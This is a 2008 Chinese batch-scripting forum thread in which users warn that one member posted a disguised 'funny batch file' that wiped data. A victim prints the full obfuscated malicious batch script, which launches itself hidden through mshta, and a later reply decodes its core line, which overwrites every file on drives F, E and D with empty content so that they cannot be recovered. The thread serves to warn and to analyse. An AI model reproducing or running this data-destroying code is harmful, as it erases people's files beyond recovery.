标题: 警惕!警惕!ID:maidu 发布危害代码! [打印本页]
作者: huzixuan 时间: 2008-4-19 22:07 标题: 警惕!警惕!ID:maidu 发布危害代码!
点击此人代码后,硬盘E、F盘大部分.rar .exe文件被清空!损失惨重!
请大家警惕!警惕!
恶毒之人,不得好报!
作者: huzixuan 时间: 2008-4-19 22:09
请管理员处理此ID
帖子在这里
http://www.cn-dos.net/forum/viewthread.php?tid=39558&fpage=1
作者: huzixuan 时间: 2008-4-19 22:12 标题: 警惕!警惕!ID:maidu 发布危害代码!
点击此人代码后,硬盘E、F盘大部分.rar .exe文件被清空!损失惨重!
请大家警惕!警惕!
恶毒之人,不得好报!
http://www.cn-dos.net/forum/viewthread.php?tid=39558&fpage=1
作者: huzixuan 时间: 2008-4-19 22:23 标题: 警惕!警惕!ID:maidu 发布危害代码!
警惕!警惕!ID:maidu 发布危害代码!
警惕!警惕!ID:maidu 发布危害代码!
请管理员处理此ID
帖子在这里
http://www.cn-dos.net/forum/viewthread.php?tid=39558&fpage=1
点击此人代码后,硬盘E、F盘大部分.rar .exe文件被清空!损失惨重!
请大家警惕!警惕!
恶毒之人,不得好报!
作者: huzixuan 时间: 2008-4-19 22:28 标题: 警惕!警惕!ID:maidu 发布危害代码!
点击此人代码后,硬盘E、F盘大部分.rar .exe文件被清空!损失惨重!
请大家警惕!警惕!
恶毒之人,不得好报!
请管理员处理此ID
帖子在这里
http://www.cn-dos.net/forum/viewthread.php?tid=39558&fpage=1
作者: huzixuan 时间: 2008-4-19 22:40
这个畜生现在将那个帖的代码编辑掉了!
作者: huzixuan 时间: 2008-4-19 22:52
给大家的忠告:在论坛内千万不要尝试不明代码! 尤其是你不熟悉的马甲!!!!!!!!!!!!!!
作者: afeichai 时间: 2008-4-19 23:59
他的代码我昨天看到了,是个VBS代码,运行后会生成个压缩文件。里面是2楼的P处理
作者: afeichai 时间: 2008-4-20 00:08
该ID最近连续发了很多不良代码,版主应该及时处理
作者: huzixuan 时间: 2008-4-20 10:26
后来发现,运行过那个代码后,从F到E的所有文件都被清空了,不止是某类型的文件。
在联盟里呆了一年以来还没遇见过这么恶毒的人,我EF盘23G的数据丢失了,索性都是一些安装程序和游戏,多年来也不舍得删,现在没了到也没什么牵挂
作者: tireless 时间: 2008-4-20 10:45
确实恶毒,我的D盘可都是些好东西,要是被清了,我的脑袋肯定会一片空白。。。以后要多留心了
作者: wyl091256 时间: 2008-4-20 13:13 标题: ......................
恶毒
作者: regvip2008 时间: 2008-4-20 13:37
所以大家以后要注意了,运行代码一定要看清楚才能运行哦!
硬是想运行不明代码就让它在虚拟机里面去运行吧!!
作者: HAT 时间: 2008-4-20 22:09
看不懂的代码,不要随便运行,受骗只能说明自己学习不够。
作者: heng520 时间: 2008-4-22 16:40
多谢楼主,提醒!
我想用虚拟机来,试代码,比较安全,,即使像楼主所说的,也只不过删除,虚拟机里的东西,应该不会影响到真正的系统。不过,最好别试看不懂的代码!
作者: yuseecn 时间: 2008-4-22 17:03
同意楼上,虚拟机运行程序比较安全。
作者: learner0 时间: 2008-4-22 19:08
下载可执行文件时,注意杀毒软件的提示
作者: learner0 时间: 2008-4-22 19:08
对于象没经过加密的vbs,bat可看其原文件是否含有恶意代码..
[ Last edited by learner0 on 2008-4-22 at 07:11 PM ]
作者: ktv98 时间: 2008-4-23 08:57
| Quote: | |
|
有些东西杀毒软件也无能为力.ps恶毒行为.
让我们这些初学者受害.
[ Last edited by ktv98 on 2008-4-23 at 09:01 AM ]
作者: huzixuan 时间: 2008-4-23 12:18
发帖的目的主要是防止更多的人受害。
因为学习不够的肯定不止我一个,若我不采取动作,相信会有更多的人上当的。
那个"maidu"用的标题是 "搞笑的批处理",大概是说这个批处理是个动画,帖出来的代码内容是个VBS代码,运行后得到一个压缩包,里面有批处理文件。
批处理文件内容:
echo off||▄︻┻═┳一>f e d
::搞怪的批处理
@if %1.=='. call:' %~s0 '&'>&1>%tmp%\%~n0
echo.|set/p x=|echo.|time/t&date/t<nul
echo 按任意键开始演示&pause>nul
goto:'
{:~ """~~~\\auther unknown date 08-04-18//~~~""" ~:}
set/p %2=<%1||(shift&color %1%2&%~s0 %1)
for %%a in (%':~-5%)do %%a:&for /r %%s in (*)do %':~-6,1%%%~ss call %%':~,8%%
{:' """~~~\\thank you to everyone!//~~~""" ':}
if %2.=='. (goto:~) else mshta vbscript:createobject("wscript.shell").run("%~s0 '",0)(window.close)
当我发现情况后,立即发帖揭露"maidu",谁知他竟恶人先告状,把帖子代码编辑成"二楼的家伙把我的代码改成病毒代码了!"::搞怪的批处理
@if %1.=='. call:' %~s0 '&'>&1>%tmp%\%~n0
echo.|set/p x=|echo.|time/t&date/t<nul
echo 按任意键开始演示&pause>nul
goto:'
{:~ """~~~\\auther unknown date 08-04-18//~~~""" ~:}
set/p %2=<%1||(shift&color %1%2&%~s0 %1)
for %%a in (%':~-5%)do %%a:&for /r %%s in (*)do %':~-6,1%%%~ss call %%':~,8%%
{:' """~~~\\thank you to everyone!//~~~""" ':}
if %2.=='. (goto:~) else mshta vbscript:createobject("wscript.shell").run("%~s0 '",0)(window.close)
查阅此人另一个帖说的大概内容是,"你们不要小瞧批处理,你们有一天可能因为运行了一个批处理导致所有盘的数据都丢失了,你们自己还不知道呢!只要你们在论坛里混,就逃不出我的这句话!!"
告戒菜鸟们:看不懂的代码再也不要随便运行了!等了你中招就被人鄙视啦!! 什么风凉话都出来了,像什么“受骗是自己学习不够”!!!!
相信大家都有运行过看不懂的代码吧!!!! 但,以后不要了!
作者: BC 时间: 2008-11-23 21:54
maidu=卖毒
作者: netbenton 时间: 2009-2-7 00:24
毒在这一句哦!:
for %%a in (%':~-5%)do %%a:&for /r %%s in (*)do %':~-6,1%%%~ss call %%':~,8%%
等于:
for %%a in (f e d) do(
%%a:
for /r %%s in (*) do >%%s call echo off
)
依次进入f: e: d:盘,读取所有文件,并写入空。
如此就算用undel也无法恢复!够毒!够毒!!
通常数据都放在这三个盘,剩个系统C:有什么用。
这人的心也太黑了,人人得以诛之!